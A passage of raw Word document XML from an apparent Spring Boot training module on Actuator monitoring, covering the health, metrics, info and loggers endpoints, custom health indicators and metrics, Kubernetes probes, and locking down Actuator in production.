                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">✈️  The Aircraft Cockpit Analogy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Imagine a pilot flying an aircraft without any instruments — no altimeter, no fuel gauge, no engine temperature, no warning lights. They would have no way of knowing if they were running out of fuel, if the engine was overheating, or if they were at the wrong altitude. They would only discover these problems when the aircraft crashed.
Spring Boot Actuator is the instrument panel (cockpit) for your application. It continuously monitors your application and exposes this information through HTTP endpoints that your operations team and monitoring tools can query at any time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Without Actuator, your operations team discovers problems because users are complaining or the server has crashed. With Actuator connected to a monitoring system like Prometheus and Grafana, your team is automatically alerted when problems start developing — often before any user is affected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding Actuator to Your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&lt;dependency&gt;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&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;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&lt;artifactId&gt;spring-boot-starter-actuator&lt;/artifactId&gt;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&lt;/dependency&gt;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That's all! Zero additional configuration to get started.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Visit http://localhost:8080/actuator to see available endpoints.</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Configuring Which Endpoints Are Exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, only /actuator/health is accessible over HTTP. You must explicitly expose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application.properties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Expose specific endpoints (recommended for production)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management.endpoints.web.exposure.include=health,info,metrics,loggers,prometheus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Expose ALL endpoints (development only — never in production!)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management.endpoints.web.exposure.include=*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Run Actuator on a separate port (best practice for production security)</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management.server.port=8081</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Change the base path (default is /actuator)</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management.endpoints.web.base-path=/admin/monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 The /health Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /health endpoint is the single most important Actuator endpoint in production. It reports whether your application is healthy and ready to serve traffic. Load balancers (like AWS ELB) and container orchestration platforms (like Kubernetes) use this endpoint to decide whether to route traffic to your instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How Health Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot automatically creates health indicators for all detected infrastructure components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DataSource — is the database connection pool functional? Can we execute queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis — is the Redis connection alive?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka — is the Kafka broker reachable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disk Space — is there enough free disk space?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail — is the email server reachable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Health Response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Minimal response (default — show-details: never):</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GET /actuator/health</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"status": "UP"            // HTTP 200</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When something is wrong:</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"status": "DOWN"          // HTTP 503 — load balancer stops routing here!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Detailed response (show-details: always):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"status": "DOWN",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"components":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"db":             { "status": "UP", "details": { "database": "PostgreSQL" }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"redis":          { "status": "UP", "details": { "version": "7.0.5" }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"diskSpace":      { "status": "UP", "details": { "free": "91 GB" }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"paymentGateway": { "status": "DOWN", "details": { "error": "Stripe unreachable" }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Creating a Custom Health Indicator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any business-critical external dependency should have a custom health indicator. If the payment gateway is down, your application should report DOWN so the load balancer stops sending traffic and your team is alerted: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@Component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public class PaymentGatewayHealthIndicator implements HealthIndicator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private final PaymentGatewayClient client;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public PaymentGatewayHealthIndicator(PaymentGatewayClient client)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this.client = client;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@Override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public Health health()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try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long start = System.currentTimeMillis();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boolean reachable = client.ping();</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long responseMs = System.currentTimeMillis() - start;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if (reachable)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return Health.up()</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.withDetail("gateway", "Stripe API")</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.withDetail("responseTime", responseMs + "ms")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.build();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return Health.down()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.withDetail("gateway", "Stripe API")</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.withDetail("error",   "Gateway did not respond")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.withDetail("impact",  "CRITICAL: Cannot process payments")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.build();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catch (Exception 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return Health.down(e).build();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Kubernetes Health Probes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kubernetes uses two separate health probes. Enable them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application.properties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management.endpoint.health.probes.enabled=true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management.health.livenessstate.enabled=true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management.health.readinessstate.enabled=true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GET /actuator/health/liveness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Is the app alive at all?</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If DOWN: Kubernetes restarts the pod (deadlock, out-of-memory)</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GET /actuator/health/readiness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Is the app ready to serve requests?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If DOWN: Kubernetes stops sending traffic but does NOT restart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Use this during startup (data loading) or planned maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 The /metrics Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /metrics endpoint exposes quantitative measurements about your application's performance and resource usage through the Micrometer library. While /health tells you 'is it working?' — metrics tell you 'how well is it working, and is that degrading over time?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying Metrics — Two-Step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Step 1: List all available metrics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GET /actuator/metrics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Step 2: Query a specific metric</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GET /actuator/metrics/jvm.memory.used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Response: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"name": "jvm.memory.used",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"baseUnit": "bytes",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"measurements": [{ "statistic": "VALUE", "value": 245760000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"availableTags":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"tag": "area", "values": ["heap", "nonheap"]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Filter by tag:</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GET /actuator/metrics/jvm.memory.used?tag=area:heap</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Critical Built-In Metrics to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Metric Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>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What It Tells You &amp; Why It Matters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http.server.requests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Count of HTTP requests, broken down by URL, method, and status code. Spike in 500s = your app is throwing exceptions.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jvm.memory.used / jvm.memory.max</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How much heap memory is in use vs. the maximum. Memory trending toward max = memory leak.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jvm.gc.pause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How long garbage collection pauses the JVM. Long pauses cause slow response times for users.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process.cpu.usage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CPU utilization of the JVM process. Pegged at 100% = infinite loop or massive traffic spike.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hikaricp.connections.pending</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Requests waiting for a DB connection. &gt; 0 consistently = your connection pool is too small.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tomcat.threads.busy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How many request-handling threads are occupied. Near max = your server is overwhelmed.</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Creating Custom Business Metrics with Micrometer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM metrics tell you about infrastructure. Custom metrics tell you about your business. These are the metrics that matter most in production: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@Service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public class TransferService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private final Counter  successCounter;</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private final Counter  failureCounter;</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private final Timer    transferTimer;</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public TransferService(MeterRegistry registry)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this.successCounter = Counter.builder("bank.transfers.success")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.description("Number of successful fund transfers")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.register(registry);</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this.failureCounter = Counter.builder("bank.transfers.failure")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.description("Number of failed fund transfers")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.register(registry);</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this.transferTimer = Timer.builder("bank.transfers.duration")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.description("Time to complete a fund transfer")</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.publishPercentiles(0.50, 0.95, 0.99) // p50, p95, p99</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.register(registry);</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public TransferResult processTransfer(TransferRequest request)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return transferTimer.recordCallable(() -&gt;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try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TransferResult result = executeTransfer(request);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successCounter.increment();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return result;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catch (Exception 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failureCounter.increment();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throw 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thick" w:color="166534" w:sz="16"/>
              <w:bottom w:val="single" w:color="166534" w:sz="6"/>
              <w:right w:val="single" w:color="166534" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCFCE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Business Value of Custom Metrics</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">With these custom metrics, your Grafana dashboard can show: Transfers per second (business throughput), Transfer failure rate (business error rate), p99 transfer latency (worst-case user experience), and active in-flight transfers. When the p99 latency spikes from 200ms to 3,000ms, your monitoring system alerts the on-call engineer within 60 seconds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 The /info Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /info endpoint returns application metadata that you configure. At first glance it seems trivial, but in production it solves a critical operational problem: 'Which version of the code is running on this server right now?'</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application.properties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management.info.env.enabled=true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info.app.name=SecureBank Online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info.app.version=2.4.1</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info.app.description=Digital Banking Platform</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info.environment=production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info.team=Backend Engineering</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info.support.slack=#backend-alerts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Git commit info (add git-commit-id-maven-plugin to pom.xml):</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management.info.git.mode=full</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Response includes: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"app": { "name": "SecureBank Online", "version": "2.4.1"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"git":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"branch": "main",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"commit":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"id": "a3f7b2c",</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"time": "2024-01-15T14:30:00Z",</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"message": "Fix: Correct interest calculation in savings accounts",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"user": { "name": "Jane Developer"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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 The /loggers Endpoint — Dynamic Log Level Changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the most powerful features of Actuator, and one that many developers don't know about: you can change log levels at RUNTIME without restarting the server. In production, you normally run at INFO level. When a bug is reported, you can temporarily switch to DEBUG level, reproduce the issue, capture the detailed logs, and switch back — all without a restart and without any downtime.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View current log level for a specific logger:</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GET /actuator/loggers/com.securebank.service.TransferService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Response: { "configuredLevel": "INFO", "effectiveLevel": "INFO"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Change log level to DEBUG at runtime (no restart!):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POST /actuator/loggers/com.securebank.service.TransferService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Content-Type: application/json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Body: { "configuredLevel": "DEBUG"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Now this class logs at DEBUG level. Capture your logs.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After diagnosis, revert to INFO:</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POST /actuator/loggers/com.securebank.service.TransferService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Body: { "configuredLevel": "INFO" }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.6 Other Essential Actuator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Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>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Purpose &amp; Use Case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/actuator/env</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View ALL environment variables, system properties, and application configuration values. Use this to verify which database URL is configured on a specific server instance.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/actuator/beans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List ALL Spring beans registered in the ApplicationContext. Use this to verify which beans are loaded and debug dependency injection issues.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/actuator/mappings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List ALL URL request mappings and which controller methods handle them. Use this to quickly find which method handles a specific URL.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/actuator/threaddump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Snapshot of all JVM threads and their current state (RUNNING, WAITING, BLOCKED). Use this to diagnose deadlocks — if 50 threads are all WAITING on the same resource, you have a deadlock.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/actuator/heapdump</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Download a full JVM heap dump as a binary file. Open it with Eclipse MAT or JProfiler to find memory leaks — objects that are still referenced but shouldn't be.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/actuator/scheduledtasks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List all @Scheduled tasks in your application along with their cron expressions and last execution times. Verify your scheduled jobs are configured correctly.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/actuator/caches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View all application caches (Spring Cache, Caffeine, Ehcache) and their statistics. Clear specific caches without restarting the application.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/actuator/shutdown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Initiate a graceful shutdown of the application. DISABLED BY DEFAULT — must be explicitly enabled. Only use on internal management port, never on public-facing port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.7 Securing Actuator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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Production Security Requirement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL: Actuator endpoints expose sensitive internal information — environment variables (which may contain passwords), thread states, heap contents, configuration values. In production, NEVER expose Actuator endpoints on the same public-facing port as your application, and ALWAYS require authentication for all endpoints except /health.</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Best Practice 1 — Run Actuator on a Separate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application.properties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Public-facing application port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server.port=8080</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Actuator-only port — firewall blocks this from public internet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Only monitoring tools and operations team can reach port 8081</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management.server.port=8081</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Best Practice 2 — Expose Only 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NEVER in production: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management.endpoints.web.exposure.include=*  # Exposes heapdump, shutdown, env passwords!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Correct production configuration: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management.endpoints.web.exposure.include=health,info,metrics,prometheus,loggers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Always disable shutdown endpoint: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management.endpoint.shutdown.enabled=false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Best Practice 3 — Require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@Bean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public SecurityFilterChain actuatorSecurity(HttpSecurity http) throws Exception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return http</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.requestMatcher(EndpointRequest.toAnyEndpoint())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.authorizeHttpRequests(auth -&gt; auth</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Health is public — load balancers need unauthenticated access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.requestMatchers(EndpointRequest.to(HealthEndpoint.class,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InfoEndpoint.class))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.permitAll()</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All other endpoints require ACTUATOR_ADMIN role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.anyRequest()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.hasRole("ACTUATOR_ADMIN")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.httpBasic(Customizer.withDefaults())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.build();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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 7: Complete Production Architecture — Everything Together</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let's synthesize everything we have learned into a single coherent picture. This is what a production-grade Spring Boot application with proper session management and monitoring looks like.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 The Complete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Layer / Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
